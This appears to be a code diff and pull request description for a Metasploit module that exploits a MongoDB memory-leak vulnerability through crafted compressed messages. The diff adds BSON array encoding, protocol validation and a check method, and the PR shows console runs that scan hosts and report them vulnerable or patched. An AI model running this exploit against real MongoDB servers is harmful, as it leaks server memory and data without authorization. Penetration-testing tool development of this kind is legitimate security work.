+    return nil if remaining <= 0 || remaining > 0x01000000 # sanity: cap at 16 MB (MongoDB max)
 
     response_body = sock.get_once(remaining, 5)
     return nil if response_body.nil?
@@ -450,11 +446,36 @@ class MetasploitModule < Msf::Auxiliary
         doc << "\x08"                        # boolean type
         doc << "#{key}\x00"
         doc << (value ? "\x01" : "\x00")
+      when Array
+        doc << "\x04"                        # array type
+        doc << "#{key}\x00"
+        doc << build_bson_array(value)
       end
     end
 
     doc << "\x00" # Document terminator
     [doc.length + 4].pack('V') + doc # Prepend document length
+  end
+
+  def build_bson_array(array)
+    doc = ''.b
+
+    array.each_with_index do |value, index|
+      case value
+      when String
+        doc << "\x02"
+        doc << "#{index}\x00"
+        doc << [value.length + 1].pack('V')
+        doc << "#{value}\x00"
+      when Integer
+        doc << "\x10"
+        doc << "#{index}\x00"
+        doc << [value].pack('V')
+      end
+    end
+
+    doc << "\x00"
+    [doc.length + 4].pack('V') + doc
   end
 
   def parse_build_info(bson_data)
@@ -524,18 +545,25 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def try_hello_command
-    begin
-      response = send_command('admin', { 'hello' => 1 })
-      return nil if response.nil?
+    connect
+    response = send_command('admin', { 'hello' => 1 })
+    disconnect
+    return nil if response.nil?
 
-      # Look for version string in response
-      if response =~ /(\d+\.\d+\.\d+)/
-        return ::Regexp.last_match(1)
-      end
+    # Look for version string in response
+    if response =~ /(\d+\.\d+\.\d+)/
+      return ::Regexp.last_match(1)
+    end
+
+    nil
+  rescue StandardError
+    nil
+  ensure
+    begin
+      disconnect
     rescue StandardError
       nil
     end
-    nil
   end
 
   def exploit_memory_leak(ip, version_info)
@@ -874,9 +902,16 @@ class MetasploitModule < Msf::Auxiliary
   def recv_mongo_response_from(socket)
     # Read header first (16 bytes minimum)
     header = socket.get_once(16, 2)
-    return nil if header.nil? || header.length < 4
+    return nil if header.nil? || header.length < 16
 
-    msg_len = header.unpack1('V')
+    msg_len = header[0, 4].unpack1('V')
+    opcode = header[12, 4].unpack1('V')
+
+    # Validate this looks like a MongoDB wire protocol response.
+    # Reject obviously non-MongoDB data (e.g. HTTP responses) early.
+    return nil unless [OP_REPLY, OP_MSG, OP_COMPRESSED].include?(opcode)
+    return nil if msg_len < 16 || msg_len > 0x01000000 # cap at 16 MB
+
     return header if msg_len <= 16
 
     # Read remaining data
@@ -903,10 +938,11 @@ class MetasploitModule < Msf::Auxiliary
 
     begin
       msg_len = response.unpack1('V')
-      return [] if msg_len > response.length
+      return [] if msg_len > response.length || msg_len < 16
 
-      # Check if response is compressed (opcode at offset 12)
+      # Validate this is a MongoDB wire protocol response
       opcode = response[12, 4].unpack1('V')
+      return [] unless [OP_REPLY, OP_MSG, OP_COMPRESSED].include?(opcode)
 
       raw = nil
       if opcode == OP_COMPRESSED
@@ -918,8 +954,10 @@ class MetasploitModule < Msf::Auxiliary
           raw = response[25, msg_len - 25]
         end
       else
-        # Uncompressed OP_MSG - skip header
-        raw = response[16, msg_len - 16]
+        # OP_REPLY has a 20-byte reply header after the 16-byte message header (offset 36)
+        # OP_MSG payload starts after the 16-byte message header (offset 16)
+        offset = opcode == OP_REPLY ? 36 : 16
+        raw = response[offset, msg_len - offset] if response.length > offset
       end
 
       return [] if raw.nil?


### PR DESCRIPTION
Added multiple improvements to the `cve_2025_14847_mongobleed.rb` module, such as adding new a dedicated `check` method,improved compression support detection as only zlib can be exploited, and resolving other false positives

## Verification

Check vuln

```
msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check

[+] 192.168.1.100:27017 - The target is vulnerable. Server leaks memory via crafted OP_COMPRESSED message (MongoDB 4.4.26)
```

Network issues now bubbled up correctly:

```
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > recheck rhost=127.0.0.1
[*] Reloading module...
[*] 127.0.0.1:27017 - Cannot reliably check exploitability. Could not connect to the target
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run rhost=127.0.0.1
[-] 127.0.0.1:27017       - Cannot reach 127.0.0.1:27017 - The connection was refused by the remote host (127.0.0.1:27017).
[*] 127.0.0.1:27017       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) >
```

Check Not vuln - no zlib compression enabled

```
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > recheck 192.168.123.144
[*] Reloading module...
[*] 192.168.123.144:27017 - The target is not exploitable. Server does not have zlib compression enabled (MongoDB 4.4.26)
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > 
```

Check not vuln - patched

```
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check tcp://127.0.0.1:30000
[*] 127.0.0.1:30000 - The target is not exploitable. Version 8.2.6 is patched
```